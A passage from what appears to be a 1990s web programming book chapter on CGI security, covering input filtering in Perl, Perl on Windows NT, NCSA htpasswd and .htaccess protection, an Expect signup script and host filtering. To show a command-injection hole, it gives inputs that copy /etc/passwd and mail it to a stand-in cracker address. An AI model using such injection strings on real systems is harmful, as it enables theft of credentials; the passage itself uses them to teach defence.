       pnminvert > $text_pbm`;
 eval `anytopnm $text_pbm | pnmscale -xsize $xs -ysize $ys >$text_file`;
 eval `pnmarith -a $text_file $button_file | ppmtogif>$write_name`;
}
else
{ eval `ppmtogif $button_file >$write_name`; }

The first code line strips out all characters except letters and digits. What could happen without this statement? In the third line, the $text variable is passed as a command-line argument to the pbmtext program in a Perl eval statement. Suppose that a malicious user passes the following in the $text variable:

x' cat /etc/passwd>password.file

This command indeed executes; the pbmtext program only expects one argument and ignores the extra text on the command line, and the rest of the statement executes. In fact, nothing even shows up in the error_log.

The user can execute the script again, this time passing the following in the $text variable:

x' mail wily@cracker.org<password.file

Our password file has been exported. Our site might come under attack soon, which is not a pleasant scenario.

In the make_button.pl script, the security hole was easy to close by allowing the user to input only letters or digits.
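To see what the letters-and-digits filter does to the hostile input shown earlier, the filter can be tried on its own. The sketch below is illustrative only; the helper name letters_and_digits_only is an assumption, and it uses tr with the complement and delete flags as one equivalent way to express the whitelist.

```perl
use strict;
use warnings;

# Hypothetical helper: keep only ASCII letters and digits, the same
# whitelist the make_button.pl filter is meant to enforce.
sub letters_and_digits_only {
    my ($text) = @_;
    $text = '' unless defined $text;
    (my $clean = $text) =~ tr/a-zA-Z0-9//cd;   # delete everything else
    return $clean;
}

for my $input ('Home', "x' cat /etc/passwd>password.file") {
    printf "%-36s -> %s\n", $input, letters_and_digits_only($input);
}
```

The quote, the spaces, the slashes, and the redirection character all disappear, so what reaches pbmtext is a harmless run of letters.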

Perl and Windows NT

Perl has been ported successfully to the 32-bit Microsoft Windows NT operating system (see note), and it is relatively easy to run CGI Perl scripts on NT regardless of the Web server (be it O'Reilly's WebSite, Microsoft's Internet Information Server (IIS), or some other choice). Nevertheless, you should keep in mind an important security concern when running Perl CGI scripts under NT (see note): Avoid at all costs placing the script interpreter (perl.exe) in the /cgi-bin directory. If the perl.exe program is in the /cgi-bin directory (wherever that might be on the NT box), any Internet client can open a URL and pass arguments directly to the interpreter, in effect establishing an interactive session with unwanted permissions on the server's file system. All sorts of horrific attacks can be mounted: formatting the hard drive, running an arbitrary binary executable on the server, and so on.

This is simple to avoid: take perl.exe (and all other shell interpreters, such as csh, ksh, and so on) out of the /cgi-bin directory and put them into a secure area on the server. Then, use the NT File Manager to associate an extension (*.pl for Perl scripts, for example) with the action perl.exe. The folks at http://www.perl.hip.com/ have developed an Internet Server API (ISAPI) extension for Win32 Perl, PerlIS.dll, that runs much faster than perl.exe. The same advice holds true: place the PerlIS.dll module in a system directory such as \winnt\system32 and associate an extension (*.plx, for example) with PerlIS.dll.

One final usage note for users of Microsoft's IIS: The script directory (typically, \winnt\system32\inetsrv\Scripts\) should be set to execute-only, not read and execute. I have seen cases where IIS running on NT 4.0 echoes the script source code to the screen instead of executing it if the script directory is both read and execute.

A Web Administrative Security Overview

The most important lesson in this chapter is that you should not run your Web server as root! If the Web server runs as root, all the CGI scripts that the server launches also run as root and have root permissions. If a form is manipulated to pass malicious data, a CGI script running as root can delete the site's data in a second or two. In UNIX, Web servers come with the configuration option of running as the unprivileged user nobody; heed this clarion call.
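A CGI script can also defend itself against a misconfigured server by checking which user it is running as. The following is a minimal sketch for UNIX systems only; the helper name is_root_uid is an assumption, and the check is a backstop, not a substitute for configuring the server correctly.

```perl
use strict;
use warnings;

# Hypothetical helper: true when the given numeric user ID is root's.
sub is_root_uid {
    my ($uid) = @_;
    return $uid == 0 ? 1 : 0;
}

print "Content-type: text/plain\n\n";

# $> is Perl's effective user ID for the current process.
if (is_root_uid($>)) {
    # A production script would stop here (for example, with exit)
    # before touching any files.
    print "Configuration error: this script must not run as root.\n";
} else {
    print "Running as user ID $>; continuing.\n";
}
```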

This section moves on to security administration tasks that are made simpler with publicly available tools.

NCSA's htpasswd Scheme

The NCSA server features a simple and elegant password-protection scheme. The core of the scheme is the htpasswd program, which encrypts passwords and adds the password and user name to a password file.

A command-line session using the htpasswd program follows:

htpasswd -c /passwordfiles/.htpasswd user1
Adding password for user1.
New password: ***
Re-type new password: ***

The -c flag creates a new file, .htpasswd, in the directory /passwordfiles/. Omit this flag to add a user to an existing file or to change the password for a user.

The .htpasswd file contains [username]:[encrypted password] entries, one per line:

user1:7YRgBIivSuMhU
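The encrypted field is a one-way hash, so a password is checked by hashing the candidate with the same salt and comparing the results. The sketch below assumes the entry was produced by the traditional crypt(3) routine, whose salt is the first two characters of the stored hash, and that the platform's crypt() still supports that scheme. The helper name password_matches, the salt 'ab', and the password 'secret' are made up for the example.

```perl
use strict;
use warnings;

# Hypothetical helper: check a candidate password against one
# "username:encrypted-password" line. crypt() reuses the salt stored at
# the front of the existing hash.
sub password_matches {
    my ($line, $user, $candidate) = @_;
    chomp $line;
    my ($name, $hash) = split /:/, $line, 2;
    return 0 unless defined $hash && $name eq $user;
    my $computed = crypt($candidate, $hash);
    return defined $computed && $computed eq $hash ? 1 : 0;
}

# Build a sample entry; 'ab' is an arbitrary two-character salt and
# 'secret' an example password (both assumptions for this sketch).
my $entry = 'user1:' . crypt('secret', 'ab');

print password_matches($entry, 'user1', 'secret') ? "match\n" : "no match\n";
print password_matches($entry, 'user1', 'guess')  ? "match\n" : "no match\n";
```

Because the file never stores the password itself, an administrator who receives a forgotten-password call can only assign a new password, not look up the old one.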

The next step is to add a document (traditionally named .htaccess) to the directory that you want to protect, specifying the location of the password file along with other information:

AuthUserFile /passwordfiles/.htpasswd
AuthGroupFile /passwordfiles/.htgroup
AuthName ByPassword
AuthType Basic

<Limit GET>
require group nicepeople
</Limit>

This file also specifies a group that is allowed access, nicepeople, and the name and location of the file that lists the users within each group. The .htgroup file is formatted similarly to the .htpasswd file; that is, [group]:[name] [name] and so forth. For example,

nicepeople:user0
nicepeople:user1 user2 user3
weirdpeople:user4 user5

and so on. The last step is to check that the server is configured properly. The following line must be in the srm.conf file:

AccessFileName .htaccess

This simply tells the server to look for the file .htaccess in a directory before serving up documents to the client. If the .htaccess file is found, the user ID and password are requested, as shown in Figure 25.3.
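When group files grow, it helps to be able to list who belongs to what. The following sketch reads lines in the [group]:[name] layout described for the .htgroup file and merges repeated group lines, as the nicepeople example suggests the server does; that merging behavior and the helper name parse_groups are assumptions of this sketch.

```perl
use strict;
use warnings;

# Hypothetical helper: parse group-file lines of the form
# "group:member member ..." into a hash of group => { member => 1 }.
# Repeated group lines are merged.
sub parse_groups {
    my (@lines) = @_;
    my %members;
    for my $line (@lines) {
        chomp $line;
        next unless $line =~ /\A([^:\s]+):\s*(.*)\z/;
        my ($group, $list) = ($1, $2);
        $members{$group}{$_} = 1 for split ' ', $list;
    }
    return \%members;
}

my $groups = parse_groups(
    'nicepeople:user0',
    'nicepeople:user1 user2 user3',
    'weirdpeople:user4 user5',
);

for my $group (sort keys %$groups) {
    print "$group: ", join(' ', sort keys %{ $groups->{$group} }), "\n";
}
```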

Figure 25.3 : The user name and password input box in Netscape.

Netscape, Mosaic, and other major browsers all show an authorization box similar to that shown in Figure 25.3. If invalid input is entered, a retry box is shown (see Figure 25.4).

Figure 25.4 : An invalid ID/password combination was entered.

The number of retries acceptable by the system can be set by the developer. It is a common phenomenon for users to register for a Web service and then forget their password; naturally, what the application administrator should do when the inevitable telephone call comes is a policy decision.

Returning to the technical discussion of HTTP security administration, it usually is a good idea to add the following line to srm.conf:

IndexIgnore /.htaccess ~

This instructs the server not to list the file in a directory listing URL (what the client sees when requesting a URL that ends with a forward slash (/) when no default file is specified).

There are two advantages to using this method of protecting documents. One is that the directory in which the .htaccess file resides, as well as all of its subdirectories, is protected. This makes it an easy task to password protect any number of documents with little administrative hassle.

The second advantage is that the user name, if supplied with a valid password allowing the user access, is logged to the httpd_log file. For example,

tomr.dialdown.access.net - tomr3 [28/Jun/1995:17:47:43 -0400] "GET
/subscribers/subscribers.html HTTP/1.0" 200 1609

shows that the user tomr3 has entered a proper password and retrieved the document specified. This gives the developer an easy way to track the reading habits of individual users (and explains why more and more commercial sites on the Web are requiring some form of registration).
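Tracking authenticated users amounts to pulling the third field out of each log line. The sketch below assumes the log uses the Common Log Format shown in the example entry; the helper name parse_auth_hit is hypothetical, and lines for unauthenticated requests (where the user field is "-") are skipped.

```perl
use strict;
use warnings;

# Hypothetical helper: pull the host, authenticated user, requested path,
# and status out of one Common Log Format line. Returns an empty list when
# the line does not match or no user was authenticated ("-").
sub parse_auth_hit {
    my ($line) = @_;
    return unless $line =~
        /\A(\S+)\s+\S+\s+(\S+)\s+\[[^\]]*\]\s+"(?:\S+)\s+(\S+)[^"]*"\s+(\d{3})\s+/;
    my ($host, $user, $path, $status) = ($1, $2, $3, $4);
    return if $user eq '-';
    return ($host, $user, $path, $status);
}

my $line = 'tomr.dialdown.access.net - tomr3 [28/Jun/1995:17:47:43 -0400] '
         . '"GET /subscribers/subscribers.html HTTP/1.0" 200 1609';

if (my ($host, $user, $path, $status) = parse_auth_hit($line)) {
    print "$user fetched $path from $host (status $status)\n";
}
```

Feeding every line of the log through such a function and counting hits per user and path gives a simple per-subscriber readership report.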

If the developer uses the Expect package (which is discussed further in the next chapter), it is easy to automate the process of adding user IDs and passwords to access and group files. Listing 25.1 is an adaptation of the mkpasswd script that comes with the Expect distribution. It is called by a METHOD=POST form requesting a name and e-mail address. It uses the e-mail name as a user ID, assigns a randomly generated password, adds them to the group and password files, and then displays the user ID and password to the client.


Listing 25.1. An adaptation of the mkpasswd script.
#!/usr/local/bin/expect
#
#  mkpasswd (adaptation)
#
puts "Content-type: text/html\n"
if {[string compare $env(REQUEST_METHOD) "POST"]==0} {
    set message [split [read stdin $env(CONTENT_LENGTH)] &]
} else {
    set message [split $env(QUERY_STRING) &]
}
foreach pair $message {
    set pair [split $pair =]
    set name [lindex $pair 0]
    set val [lindex $pair  1]
    if {($name=="name") || ($name=="pass")} {
        regsub -all {\+} $val { } val
        # kludge to unescape some chars
        regsub -all {\%0A} $val \n\t val
        regsub -all {\%2C} $val {,} val
        regsub -all {\%27} $val {'} val
        # browsers may send the @ of an e-mail address as %40
        regsub -all {\%40} $val {@} val
        set id($name) $val
    }
}
if {($id(name)=="") || ($id(pass)=="")} {
    puts "<h1>You have not entered the correct information.<br>\
Please try again</h1>"
    exit
}

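# Accept only a conservative user@machine.domain form. Characters such as
# ':' or whitespace would corrupt the password and group files. Testing the
# return value of regexp avoids reading tmp when nothing matched.
set pattern {^([A-Za-z0-9_.-]+)@([A-Za-z0-9_.-]+)\.([A-Za-z]+)$}
if {![regexp $pattern $id(pass) tmp user machine domain]} {
    puts "<h1>You have not entered the correct information.<br>\
Please try again</h1>"
    exit
}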

# insert char into password at a random position
proc insert {pvar char} {
    upvar $pvar p
    set p [linsert $p [rand [expr 1+[llength $p]]] $char]
}

proc rand {m} {
    global _ran

    set period 233280
    set _rand [expr $_ran*9301]
    set _ran [expr ($_rand + 49297) % $period]
    expr int($m*($_ran/double($period)))
}

# given a size, distribute between left and right hands
# taking into account where we left off
proc psplit {max lvar rvar} {
    upvar $lvar left $rvar right
    global isleft
    if {$isleft} {
        set right [expr $max/2]
        set left [expr $max-$right]
        set isleft [expr !($max%2)]
    } else {
        set left [expr $max/2]
        set right [expr $max-$left]
        set isleft [expr $max%2]
    }
}

# defaults
set length 8
set minnum 2
set minlower 2
set minupper 2
set verbose 0
set distribute 0
set passfile "/users/alex/.htpasswd"
set prog "/users/alex/htpasswd"
set group "/users/alex/.htgroups"

# if there is any underspecification, use additional lowercase letters
set minlower [expr $length - ($minnum + $minupper)]

set lpass ""        ;# password chars typed by left hand
set rpass ""        ;# password chars typed by right hand

set _ran [pid]

# choose left or right starting hand
set initially_left [set isleft [rand 2]]

if {$distribute} {
    set lkeys {q w e r t a s d f g z x c v b}
    set rkeys {y u i o p h j k l n m}
    set lnums {1 2 3 4 5 6}
    set rnums {7 8 9 0}
} else {
    set lkeys {a b c d e f g h i j k l m n o p q r s t u v w x y z}
    set rkeys {a b c d e f g h i j k l m n o p q r s t u v w x y z}
    set lnums {0 1 2 3 4 5 6 7 8 9}
    set rnums {0 1 2 3 4 5 6 7 8 9}
}

set lkeys_length [llength $lkeys]
set rkeys_length [llength $rkeys]
set lnums_length [llength $lnums]
set rnums_length [llength $rnums]

psplit $minnum left right
for {set i 0} {$i<$left} {incr i} {
    insert lpass [lindex $lnums [rand $lnums_length]]
}
for {set i 0} {$i<$right} {incr i} {
    insert rpass [lindex $rnums [rand $rnums_length]]
}

psplit $minlower left right
for {set i 0} {$i<$left} {incr i} {
    insert lpass [lindex $lkeys [rand $lkeys_length]]
}
for {set i 0} {$i<$right} {incr i} {
    insert rpass [lindex $rkeys [rand $rkeys_length]]
}

psplit $minupper left right
for {set i 0} {$i<$left} {incr i} {
    insert lpass [string toupper [lindex $lkeys [rand $lkeys_length]]]
}
for {set i 0} {$i<$right} {incr i} {
    insert rpass [string toupper [lindex $rkeys [rand $rkeys_length]]]
}

# merge results together
if {$initially_left} {
    regexp "(\[^ ]*) *(.*)" "$lpass" x password lpass
    while {[llength $lpass]} {
        regexp "(\[^ ]*) *(.*)" "$password$rpass" x password rpass
        regexp "(\[^ ]*) *(.*)" "$password$lpass" x password lpass
    }
    if {[llength $rpass]} {
        append password $rpass
    }
} else {
    regexp "(\[^ ]*) *(.*)" "$rpass" x password rpass
    while {[llength $rpass]} {
        regexp "(\[^ ]*) *(.*)" "$password$lpass" x password lpass
        regexp "(\[^ ]*) *(.*)" "$password$rpass" x password rpass
    }
    if {[llength $lpass]} {
        append password $lpass
    }
}

if {[info exists user]} {
    if {!$verbose} {
        log_user 0
    }
    if {[file exists $passfile]} {
        spawn $prog $passfile $user
    } else {
        spawn $prog -c $passfile $user
    }
    expect {
        "New password:" {
            send "$password\r"
            exp_continue
        }
        "new password:" {
            send "$password\r"
            exp_continue
        }
    }
}

set fileHandle [open $group a+]
puts $fileHandle "new_user:$user"
close $fileHandle

puts "<h1>Thank you for signing up for our service</h1><hr>"
puts "<h2>Your userid is:  $user<BR>"
puts "Your password is:    $password</h2><hr>"
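For readers more at home in Perl than in Tcl, the password-generation idea in Listing 25.1 (a fixed length, a minimum number of digits and uppercase letters, lowercase letters for the rest, and a final shuffle) can be sketched as follows. This is not a port of mkpasswd: the helper name make_password is hypothetical, the left-hand and right-hand key distribution is omitted, and Perl's built-in rand() is not a cryptographically strong source, so treat the result as an illustration only.

```perl
use strict;
use warnings;
use List::Util qw(shuffle);

# Hypothetical helper: build a password of $length characters containing
# $min_digits digits and $min_upper uppercase letters; the remaining
# characters are lowercase letters. The order is then shuffled.
sub make_password {
    my ($length, $min_digits, $min_upper) = @_;
    die "length too small\n" if $length < $min_digits + $min_upper;

    my @digits = ('0' .. '9');
    my @upper  = ('A' .. 'Z');
    my @lower  = ('a' .. 'z');

    my @chars;
    push @chars, $digits[ int rand @digits ] for 1 .. $min_digits;
    push @chars, $upper[ int rand @upper ]   for 1 .. $min_upper;
    push @chars, $lower[ int rand @lower ]
        for 1 .. $length - $min_digits - $min_upper;

    return join '', shuffle @chars;
}

# Same defaults as the listing: eight characters, two digits, two uppercase.
print make_password(8, 2, 2), "\n";
```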

NCSA's Host-Filtering Method

Another useful tool for the administrator is host filtering: allowing or disallowing access to files based on the remote host name. With the NCSA httpd server, host filtering also can be done with the .htaccess file:

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName DenyBadUsers
AuthType Basic

<Limit GET>
order deny,allow
deny from all
allow from .au
</Limit>

In this case, there is no password protection on the directory; pointing the user and group files at /dev/null indicates that there is no file. The <Limit GET> block indicates which hosts will be allowed or denied. In the preceding example, everyone is denied access except users making requests from the Australian domain, .au.

In the following example, all users from the domain robotX.net will be denied access. All other users will be allowed access, but only after entering a proper user ID and password found in the .htpasswd and .htgroup files:

AuthUserFile /security/.htpasswd
AuthGroupFile /security/.htgroup
AuthName GoodUsers
AuthType Basic

<Limit GET>
order allow,deny
allow from all
deny from .robotX.net
require group nicepeople
</Limit>

This method of protection is particularly useful for denying access to Web robots that might be causing problems on a Web site. By placing an access file in the HTTP server root directory, with /dev/null for the user and group files, any remote sites causing trouble can be readily denied access to the entire Web site.
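The effect of the order directive is easier to reason about when it is written out as code. The sketch below models the evaluation as I understand it, which is an assumption rather than a quotation from the server documentation: the list named first is applied first, and the list named second overrides it. The helper names matches_any and host_allowed are hypothetical, and host names are matched by suffix only.

```perl
use strict;
use warnings;

# Hypothetical helper: does $host match any pattern in the list?
# "all" matches every host; ".au" matches any name ending in ".au".
sub matches_any {
    my ($host, @patterns) = @_;
    for my $pattern (@patterns) {
        return 1 if $pattern eq 'all';
        return 1 if $host =~ /\Q$pattern\E\z/i;
    }
    return 0;
}

# Sketch of the evaluation order (an assumption, see the text above).
sub host_allowed {
    my ($order, $deny, $allow, $host) = @_;
    if ($order eq 'deny,allow') {
        my $ok = 1;                                # default: allow
        $ok = 0 if matches_any($host, @$deny);
        $ok = 1 if matches_any($host, @$allow);    # allow overrides deny
        return $ok;
    }
    my $ok = 0;                                    # allow,deny default: deny
    $ok = 1 if matches_any($host, @$allow);
    $ok = 0 if matches_any($host, @$deny);         # deny overrides allow
    return $ok;
}

# The first host-filtering example: deny everyone except the .au domain.
for my $host ('www.example.edu.au', 'www.example.com') {
    printf "%-20s %s\n", $host,
        host_allowed('deny,allow', ['all'], ['.au'], $host) ? 'allowed' : 'denied';
}
```

Under this model, a host that matches both lists is allowed with order deny,allow and refused with order allow,deny, so the order line matters whenever one of the lists says all.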

Transaction Security and Security Administration Check


Footnotes

You can find the RSA Labs home page at http://www.rsa.com/, and a general on-line FAQ about authentication, public-key cryptography, and digital signatures at http://www.rsa.com/rsalabs/faq/faq_gnrl.html.
A HotJava product description and Java language description are at http://java.sun.com/.
The Kerberos on-line FAQ is at http://www.ov.com/misc/krb-faq.html.
The essential features of Pretty Good Privacy are available at http://www.mit.edu/people/warlord/pgp-class/pgp-works.html.
The RIPEM information page is http://www.cs.indiana.edu/ripem/dir.html. Mark Riordan runs a nonanonymous FTP server at ripem.msu.edu (because of RSA export restrictions, it is open only to U.S. and Canadian residents); to use this server, telnet to ripem.msu.edu, fill out a brief questionnaire, and certify eligibility. Then, the software can be downloaded via FTP. Participants in RIPEM secure communications networks store their public keys on this server; you can download the public key database from ripem.msu.edu/pub/crypt/ripem/pubkeys.txt.
EIT's information home for Secure NCSA httpd is http://www.eit.com/projects/s-http/. This includes a good historical introduction to the technology.
Allan Schiffman's Interop 1994 speech on SHTTPD is at http://www.eit.com/presentations/shttp-ams/index.html.
See http://nii-server.isi.edu/gost-group/ for details on the GOST group's work on NetCheque and NetCash.
First Virtual is on-line at http://www.fv.com/.
Digicash has a marketing brochure at http://www.digicash.com/publish/digibro.html and recent news at http://www.digicash.com/news/news.html.
Microsoft's Internet Security framework FAQ is available at http://www.microsoft.com/intdev/security/faq4.htm.
Paul Phillips has a good CGI security resource page at http://www.cerf.net/~paulp/cgi-security/.
Win32 Perl porting information is at http://www.perl.hip.com/. Recently, the NT port was extended to run on Win95 as well, but Perl on NT overall is significantly more robust. A mailing group is set up for 32-bit Perl porting issues; the group e-mail is perl-win32-users@mail.hip.com, and new subscribers can be enrolled via the porting information URL.
Tom Christiansen has introductory information on the Perl NT problems at http://mox.perl.com/perl/news/latro-announce.html. His Perl 5 script latro, a probe program to detect sites with these problems, is available at http://mox.perl.com/perl/scripts/latro.html. The NT dangers are explored in depth, along with guidelines for proper usage of Perl under NT, at http://w4.lns.cornell.edu/~pvhp/perl/ntperl.html.